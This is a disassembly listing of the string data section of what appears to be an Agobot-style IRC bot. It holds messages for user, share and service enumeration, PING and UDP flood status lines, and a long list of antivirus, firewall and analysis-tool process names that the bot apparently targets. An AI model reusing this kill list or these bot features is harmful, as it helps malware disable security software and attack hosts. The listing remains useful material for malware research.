aGuest db 'Guest',0 ; DATA XREF: sub_407D31:loc_407E4A�o
align 10h
aUser_1 db 'User',0 ; DATA XREF: sub_407D31:loc_407E43�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_407D31:loc_407E3C�o
align 4
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_407D31+D4�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_407D31+AC�o
align 4
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_407D31+81�o
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_407D31+50�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_4080FF:loc_408218�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_4080FF:loc_408211�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_4080FF:loc_40820A�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_4080FF:loc_408203�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_4080FF:loc_4081FC�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_4080FF:loc_4081DF�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_4080FF:loc_4081D8�o
align 10h
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_4080FF:loc_4081D1�o
align 8
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_4080FF+CB�o
db ' the domain.',0
align 4
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_4080FF:loc_4081A6�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_4080FF:loc_40819F�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_4080FF:loc_408198�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_4080FF:loc_40818E�o
align 10h
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_4080FF+85�o
align 4
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_4080FF:loc_408168�o
align 10h
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_4080FF:loc_40815E�o
align 10h
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_4080FF:loc_408154�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_4080FF:loc_40814A�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_4080FF:loc_408140�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_4080FF+37�o
align 4
aNetSServerSMes db '[NET]: %s <Server: %S> <Message: %S>',0 ; DATA XREF: sub_40822F+A4�o
align 10h
aNetMessageSent db '[NET]: Message sent successfully.',0 ; DATA XREF: sub_40822F+7C�o
align 4
aNetSNoServiceS db '[NET]: %s: No service specified.',0 ; DATA XREF: sub_4082EB+65�o
align 4
aNetErrorWithSe db '[NET]: Error with service: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4082EB+4F�o
aNetSServiceS_ db '[NET]: %s service: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4082EB+33�o
align 4
aNetSNoShareSpe db '[NET]: %s: No share specified.',0 ; DATA XREF: sub_408363+AA�o
align 4
aNetSShareS_ db '[NET]: %s share: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_408363+88�o
align 10h
aNetSErrorWithS db '[NET]: %s: Error with share: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_408363+56�o
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_408421+CE�o
align 10h
aNo db 'No',0 ; DATA XREF: sub_408421+BA�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_408421+B3�o
aNetShareListEr db '[NET]: Share list error: %s <%ld>',0 ; DATA XREF: sub_408421+74�o
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_408421+1D�o
align 4
aNetSNoUsername db '[NET]: %s: No username specified.',0 ; DATA XREF: sub_408540+B5�o
align 4
aNetSErrorWithU db '[NET]: %s: Error with username: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_408540+93�o
align 4
aNetSUsernameS_ db '[NET]: %s username: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_408540+6D�o
align 10h
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_40860A+144�o
align 4
aNetAnAccessVio db '[NET]: An access violation has occured.',0
; DATA XREF: sub_40860A:loc_4086F5�o
aS_3 db ' %S',0 ; DATA XREF: sub_40860A+B8�o
align 4
aNetUserListErr db '[NET]: User list error: %s <%ld>',0 ; DATA XREF: sub_40860A+78�o
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_40860A+1F�o
aFlushdnsNotSup db '[FLUSHDNS]: Not supported by this system.',0
; DATA XREF: sub_4087B6:loc_40888D�o
align 4
aFlushdnsUnable db '[FLUSHDNS]: Unable to allocation ARP cache.',0
; DATA XREF: sub_4087B6:loc_40885E�o
aFlushdnsArpCac db '[FLUSHDNS]: ARP cache is empty.',0 ; DATA XREF: sub_4087B6:loc_40880A�o
aFlushdnsErrorG db '[FLUSHDNS]: Error getting ARP cache: <%d>.',0
; DATA XREF: sub_4087B6+44�o
align 4
aPingFinishedSe db '[PING]: Finished sending pings to %s.',0 ; DATA XREF: sub_40893A+138�o
align 4
aPingErrorSendi db '[PING]: Error sending pings to %s.',0 ; DATA XREF: sub_40893A+6C�o
align 10h
aUdpFinishedSen db '[UDP]: Finished sending packets to %s.',0 ; DATA XREF: sub_408AC3+1CA�o
align 4
aUdpErrorSendin db '[UDP]: Error sending pings to %s.',0 ; DATA XREF: sub_408AC3+8C�o
align 4
aHass_exe db 'hass.exe',0 ; DATA XREF: .text:0042F744�o
align 4
aWinmp_exe db 'winmp.exe',0 ; DATA XREF: .text:0042F740�o
align 4
aBling_exe db 'bling.exe',0 ; DATA XREF: .text:0042F73C�o
align 10h
aWuamgrd_exe db 'wuamgrd.exe',0 ; DATA XREF: .text:0042F738�o
aScguard_exe db 'scguard.exe',0 ; DATA XREF: .text:0042F734�o
aWinssv_exe db 'winssv.exe',0 ; DATA XREF: .text:0042F730�o
align 4
aWruaclt_exe db 'WRUACLT.EXE',0 ; DATA XREF: .text:0042F72C�o
aWuacrlt_exe db 'WUACRLT.EXE',0 ; DATA XREF: .text:0042F728�o
aWuanclt_exe db 'WUANCLT.EXE',0 ; DATA XREF: .text:0042F724�o
aMsconfig_exe db 'MsConfiG.exe',0 ; DATA XREF: .text:0042F720�o
align 4
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .text:0042F71C�o
align 4
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .text:0042F718�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .text:0042F714�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .text:0042F710�o
align 10h
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .text:0042F70C�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .text:0042F708�o
align 4
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .text:0042F704�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .text:0042F700�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .text:0042F6FC�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .text:0042F6F8�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .text:0042F6F4�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .text:0042F6F0�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .text:0042F6EC�o
align 4
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: .text:0042F6E8�o
align 4
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .text:0042F6E4�o
align 4
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: .text:0042F6E0�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: .text:0042F6DC�o
align 10h
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: .text:0042F6D8�o
align 4
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: .text:0042F6D4�o
align 4
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: .text:0042F6D0�o
align 4
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: .text:0042F6CC�o
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: .text:0042F6C8�o
align 4
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: .text:0042F6C4�o
align 4
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: .text:0042F6C0�o
align 4
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: .text:0042F6BC�o
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: .text:0042F6B8�o
align 4
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: .text:0042F6B4�o
align 4
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: .text:0042F6B0�o
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: .text:0042F6AC�o
align 4
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: .text:0042F6A8�o
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: .text:0042F6A4�o
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: .text:0042F6A0�o
align 4
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: .text:0042F69C�o
aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: .text:0042F698�o
align 10h
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: .text:0042F694�o
align 10h
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: .text:0042F690�o
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: .text:0042F68C�o
align 10h
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: .text:0042F688�o
align 10h
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: .text:0042F684�o
align 10h
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: .text:0042F680�o
align 10h
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: .text:0042F67C�o
align 10h
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .text:0042F678�o
align 4
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: .text:0042F674�o
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .text:0042F670�o
align 4
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: .text:0042F66C�o
align 4
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: .text:0042F668�o
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: .text:0042F664�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .text:0042F660�o
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .text:0042F65C�o
align 4
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: .text:0042F658�o
align 4
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: .text:0042F654�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .text:0042F650�o
align 4
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: .text:0042F64C�o
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: .text:0042F648�o
align 4
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: .text:0042F644�o
align 4
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: .text:0042F640�o
align 4
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: .text:0042F63C�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: .text:0042F638�o
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: .text:0042F634�o
align 10h
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: .text:0042F630�o
align 4
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: .text:0042F62C�o
align 4
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: .text:0042F628�o
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: .text:0042F624�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: .text:0042F620�o
align 4
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: .text:0042F61C�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: .text:0042F618�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: .text:0042F614�o
align 10h
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: .text:0042F610�o
align 4
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: .text:0042F60C�o
align 4
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: .text:0042F608�o
align 4
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: .text:0042F604�o
align 4
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: .text:0042F600�o
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: .text:0042F5FC�o
align 10h
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: .text:0042F5F8�o
align 4
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: .text:0042F5F4�o
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: .text:0042F5F0�o
align 4
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: .text:0042F5EC�o
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: .text:0042F5E8�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: .text:0042F5E4�o
align 10h
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: .text:0042F5E0�o
align 10h
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: .text:0042F5DC�o
align 10h
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: .text:0042F5D8�o
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: .text:0042F5D4�o
align 4
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: .text:0042F5D0�o
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: .text:0042F5CC�o
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: .text:0042F5C8�o
align 10h
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: .text:0042F5C4�o
align 4
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: .text:0042F5C0�o
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: .text:0042F5BC�o
align 4
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: .text:0042F5B8�o
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: .text:0042F5B4�o
align 10h
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: .text:0042F5B0�o
align 4
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: .text:0042F5AC�o
align 4
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: .text:0042F5A8�o
align 4
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: .text:0042F5A4�o
align 4
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: .text:0042F59C�o
; .text:0042F5A0�o
align 10h
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .text:0042F598�o
align 4
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: .text:0042F594�o
align 4
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: .text:0042F590�o
align 4
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: .text:0042F58C�o
align 4
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: .text:0042F588�o
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: .text:0042F584�o
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: .text:0042F580�o
align 10h
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: .text:0042F57C�o
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: .text:0042F578�o
align 4
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: .text:0042F574�o
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: .text:0042F570�o
align 4
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: .text:0042F56C�o
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: .text:0042F568�o
align 10h
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: .text:0042F564�o
align 4
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: .text:0042F560�o
align 4
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: .text:0042F55C�o
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: .text:0042F558�o
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: .text:0042F554�o
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: .text:0042F550�o
align 4
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: .text:0042F54C�o
aTca_exe db 'TCA.EXE',0 ; DATA XREF: .text:0042F548�o
aTc_exe db 'TC.EXE',0 ; DATA XREF: .text:0042F544�o
align 10h
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: .text:0042F540�o
align 4
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: .text:0042F53C�o
align 4
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: .text:0042F538�o
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: .text:0042F534�o
align 10h
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: .text:0042F530�o
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .text:0042F52C�o
align 4
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .text:0042F528�o
align 4
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .text:0042F524�o
align 4
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: .text:0042F520�o
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: .text:0042F51C�o
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: .text:0042F518�o
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: .text:0042F514�o
align 10h
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: .text:0042F510�o
aUpd32_exe db 'UPD32.EXE',0 ; DATA XREF: .text:0042F50C�o
align 4
aSvshost32_exe db 'SVSHOST32.EXE',0 ; DATA XREF: .text:0042F508�o
align 4
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .text:0042F504�o
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .text:0042F500�o
align 4
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .text:0042F4FC�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .text:0042F4F8�o
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: .text:0042F4F4�o
align 4
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: .text:0042F4F0�o
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: .text:0042F4EC�o
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: .text:0042F4E8�o
align 4
aStart_exe db 'START.EXE',0 ; DATA XREF: .text:0042F4E4�o
align 10h
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: .text:0042F4E0�o
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: .text:0042F4DC�o
align 4
aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: .text:0042F4D8�o
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: .text:0042F4D4�o
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: .text:0042F4D0�o
align 4
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: .text:0042F4CC�o
align 4
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: .text:0042F4C8�o
align 4
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: .text:0042F4C4�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: .text:0042F4C0�o
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: .text:0042F4BC�o
align 4
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: .text:0042F4B8�o
align 4
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: .text:0042F4B4�o
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: .text:0042F4B0�o
align 4
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: .text:0042F4AC�o
align 4
aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: .text:0042F4A8�o
align 4
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: .text:0042F4A4�o
align 10h
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .text:0042F4A0�o
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: .text:0042F49C�o
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: .text:0042F498�o
align 10h
aShn_exe db 'SHN.EXE',0 ; DATA XREF: .text:0042F494�o
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: .text:0042F490�o
aSh_exe db 'SH.EXE',0 ; DATA XREF: .text:0042F48C�o
align 4
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: .text:0042F488�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: .text:0042F484�o
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: .text:0042F480�o
align 4
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: .text:0042F47C�o
align 4
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .text:0042F478�o
align 4
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .text:0042F474�o
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .text:0042F470�o
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: .text:0042F46C�o
align 10h
aSd_exe db 'SD.EXE',0 ; DATA XREF: .text:0042F468�o
align 4
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: .text:0042F464�o
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: .text:0042F460�o
align 10h
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: .text:0042F45C�o
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: .text:0042F458�o
align 4
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: .text:0042F454�o
align 4
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: .text:0042F450�o
align 10h
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: .text:0042F44C�o
align 4
aSc_exe db 'SC.EXE',0 ; DATA XREF: .text:0042F448�o
align 4
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: .text:0042F444�o
align 10h
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: .text:0042F440�o
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: .text:0042F43C�o
align 4
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: .text:0042F438�o
align 4
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: .text:0042F434�o
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: .text:0042F430�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .text:0042F42C�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .text:0042F428�o
align 10h
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: .text:0042F424�o
align 10h
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: .text:0042F420�o
align 10h
aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: .text:0042F41C�o
align 10h
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: .text:0042F418�o
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: .text:0042F414�o
align 4
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: .text:0042F410�o
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: .text:0042F40C�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: .text:0042F408�o
align 10h
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: .text:0042F404�o
align 10h
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: .text:0042F400�o
aReged_exe db 'REGED.EXE',0 ; DATA XREF: .text:0042F3FC�o
align 4
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: .text:0042F3F8�o
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: .text:0042F3F4�o
align 10h
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: .text:0042F3F0�o
align 4
aRay_exe db 'RAY.EXE',0 ; DATA XREF: .text:0042F3EC�o
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: .text:0042F3E8�o
align 4
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: .text:0042F3E4�o
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: .text:0042F3E0�o
align 10h
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: .text:0042F3DC�o
align 4
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: .text:0042F3D8�o
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: .text:0042F3D4�o
align 4
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: .text:0042F3D0�o
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: .text:0042F3CC�o
align 10h
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: .text:0042F3C8�o
align 4
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: .text:0042F3C4�o
align 4
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: .text:0042F3C0�o
align 4
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: .text:0042F3BC�o
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: .text:0042F3B8�o
align 4
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: .text:0042F3B4�o
align 10h
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: .text:0042F3B0�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .text:0042F3AC�o
align 4
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: .text:0042F3A8�o
align 10h
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: .text:0042F3A4�o
align 4
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: .text:0042F3A0�o
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: .text:0042F39C�o
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: .text:0042F398�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: .text:0042F394�o
align 4
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: .text:0042F390�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: .text:0042F38C�o
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: .text:0042F388�o
align 4
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: .text:0042F384�o
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: .text:0042F380�o
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: .text:0042F37C�o
align 10h
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: .text:0042F378�o
align 4
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: .text:0042F374�o
align 4
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: .text:0042F370�o
align 4
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: .text:0042F36C�o
align 4
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: .text:0042F368�o
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: .text:0042F364�o
align 10h
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: .text:0042F360�o
align 4
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: .text:0042F35C�o
align 4
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: .text:0042F358�o
align 4
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: .text:0042F354�o
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: .text:0042F350�o
align 10h
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: .text:0042F34C�o
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: .text:0042F348�o
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: .text:0042F344�o
align 10h
